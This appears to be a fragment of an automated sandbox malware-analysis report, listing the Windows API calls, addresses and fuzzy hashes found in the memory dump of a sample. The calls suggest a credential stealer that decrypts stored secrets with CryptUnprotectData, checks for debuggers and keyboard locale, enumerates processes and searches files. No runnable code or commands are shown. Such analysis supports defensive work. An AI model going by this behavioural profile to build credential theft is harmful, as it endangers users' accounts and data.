                    • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                    • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                    • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                    APIs
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                    • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                    • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptLocalString$AllocFree
                    • String ID: N@
                    • API String ID: 4291131564-4229412743
                    • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                    • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                    • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                    • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                    APIs
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                    • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 040B7E48
                    • LocalAlloc.KERNEL32(00000040,?), ref: 040B7E60
                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 040B7E74
                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 040B7EC9
                    • LocalFree.KERNEL32(00000000), ref: 040B7F89
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                    • String ID:
                    • API String ID: 3090951853-0
                    • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                    • Instruction ID: eff0401ecb1636de8391406debc935c13fbcaf108f627cee4a25714bc6040993
                    • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                    • Instruction Fuzzy Hash: EA412A71A50218ABDB24DB94DC88FEDB3B4FB48708F204199E149B7190DB742F85CFA9
                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 040BBE09
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 040BBE1E
                    • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 040BBE29
                    • GetCurrentProcess.KERNEL32(C0000409), ref: 040BBE45
                    • TerminateProcess.KERNEL32(00000000), ref: 040BBE4C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                    • String ID:
                    • API String ID: 2579439406-0
                    • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                    • Instruction ID: 6499add1e4e183ced19e68a4f8bd4c6b13ae2e2991a7e6cf876f507599a5d0a4
                    • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                    • Instruction Fuzzy Hash: 2321A2BC9002059FDB14DF69F8896963BF4FB0A314F504039E94997264EBB06981EB4D
                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                    • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                    • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                    • String ID:
                    • API String ID: 2579439406-0
                    • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                    • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                    • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                    • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 040A74B4
                    • RtlAllocateHeap.NTDLL(00000000), ref: 040A74BB
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 040A74E8
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 040A750B
                    • LocalFree.KERNEL32(?), ref: 040A7515
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                    • String ID:
                    • API String ID: 2609814428-0
                    • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                    • Instruction ID: 320c99c7681db7e9c8a55361f5a6bdb720a77221d2296c63061fb30a61b0ebf5
                    • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                    • Instruction Fuzzy Hash: 2801C0B5B80208BBEB14DFE4DD45F9D77B9EB44705F108155F705BB2C0D6B0AA018B65
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                    • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                    • String ID:
                    • API String ID: 3657800372-0
                    • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                    • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                    • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                    • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 040B9885
                    • Process32First.KERNEL32(00420ACA,00000128), ref: 040B9899
                    • Process32Next.KERNEL32(00420ACA,00000128), ref: 040B98AE
                    • StrCmpCA.SHLWAPI(?,00000000), ref: 040B98C3
                    • CloseHandle.KERNEL32(00420ACA), ref: 040B98E1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                    • String ID:
                    • API String ID: 420147892-0
                    • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                    • Instruction ID: d6195237a3ee14073bbd96a683403868cc548d03841cb8d6035fdca6e788d584
                    • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                    • Instruction Fuzzy Hash: 18010CB9A50208FFDB20DFE4CD54BEDB7F9EF49700F004199A945A6280D774AA40DF91
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                    • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                    • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                    • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                    • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                    • String ID:
                    • API String ID: 420147892-0
                    • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                    • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                    • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                    • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                    APIs
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                      • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                      • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                      • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                      • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                      • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 040AE709
                    • StrCmpCA.SHLWAPI(?,004214F8), ref: 040AE759
                    • StrCmpCA.SHLWAPI(?,004214FC), ref: 040AE76F
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 040AEE46
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                    • String ID:
                    • API String ID: 433455689-0
                    • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                    • Instruction ID: 30702d1d9d7f5a39b0ddef5334114610c8a6b2d3d2b43300c82a185b8c787140
                    • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                    • Instruction Fuzzy Hash: D1121C71B102189BEB19FBA4DD94EED7379AF5430CF4041A9A58A72090EF347B88CF95
                    APIs
                    • CryptBinaryToStringA.CRYPT32(00000000,040A53EB,40000001,00000000,00000000,?,040A53EB), ref: 040B9127
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptString
                    • String ID:
                    • API String ID: 80407269-0
                    • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                    • Instruction ID: 0a954588ec3d94c48fb1bc298277a442205e5d5ad0e63872c9866d7ed88bd09d
                    • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                    • Instruction Fuzzy Hash: 1C110DB4204204BFDB00CF94DC98FAA33A9AFC9744F009958FA499B350D775F842EBA5
                    APIs
                    • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptString
                    • String ID:
                    • API String ID: 80407269-0
                    • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                    • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                    • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                    • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                    APIs
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,040A5155,00000000,00000000), ref: 040A9D56
                    • LocalAlloc.KERNEL32(00000040,?,?,?,040A5155,00000000,?), ref: 040A9D68
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,040A5155,00000000,00000000), ref: 040A9D91
                    • LocalFree.KERNEL32(?,?,?,?,040A5155,00000000,?), ref: 040A9DA6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptLocalString$AllocFree
                    • String ID:
                    • API String ID: 4291131564-0
                    • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                    • Instruction ID: a782b91fe239bbbea29898daa90f5fa33238b16fb74b22111e72375f0ff3d5fc
                    • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                    • Instruction Fuzzy Hash: DF11A4B4240208BFEB10CFA4CC95FAA77B5EB89704F208458FD159B390C776A951CB90
                    APIs
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 040A9DEB
                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 040A9E0A
                    • memcpy.MSVCRT(?,?,?), ref: 040A9E2D
                    • LocalFree.KERNEL32(?), ref: 040A9E3A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                    • String ID:
                    • API String ID: 3243516280-0
                    • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                    • Instruction ID: 373eda70253990e65f6a90f857002ce5cc8ba69a442bf83637a9ac0a4f06be44
                    • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                    • Instruction Fuzzy Hash: 4D11FAB8A00209EFDB04CFA4D985AAE77F5FF89300F104558E915AB350D730AA10CF61
                    APIs
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                    • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                    • LocalFree.KERNEL32(?), ref: 00409BD3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                    • String ID:
                    • API String ID: 3243516280-0
                    • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                    • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                    • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                    • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,024EBCF0,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                    • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,024EBCF0,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,024EBCF0,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                    • wsprintfA.USER32 ref: 00417AB7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                    • String ID:
                    • API String ID: 362916592-0
                    • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                    • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                    • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                    • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                    APIs
                    • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharCreateInstanceMultiWide
                    • String ID:
                    • API String ID: 123533781-0
                    • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                    • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                    • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                    • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .$GetProcAddress.$l
                    • API String ID: 0-2784972518
                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                    • Instruction ID: a82863a47a7ee32a9593f35e3836f8bcdee46c17d62b6d218b556de78f494dec
                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                    • Instruction Fuzzy Hash: AA3139B6910609DFEB10CF99C884AAEBBF5FF48328F15404AD541BB210D771FA55CBA4
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 040BD156
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                    • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                    • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                    • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                    • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                    • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                    • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1880865468.00000000024BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 024BE000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_24be000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction ID: ad2f4b0b84fe09944a2ea641db871d63e6d5f6f29712e235fb4c15de118520d9
                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction Fuzzy Hash: 7D118272340100AFD744DF55DC90EE673EAEF89324B1A8056ED08CB715D7B9E842CB60
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                    • Instruction ID: 27bfe31bfb35ad12db8d1555e65b8e29a56a6146f1affa9217d62723929b1f3d
                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                    • Instruction Fuzzy Hash: 2E01DB776016088FDF21CFA4C804BAA33F5FB86315F4544B5E506E7241E774B941CB90
                    Memory Dump Source
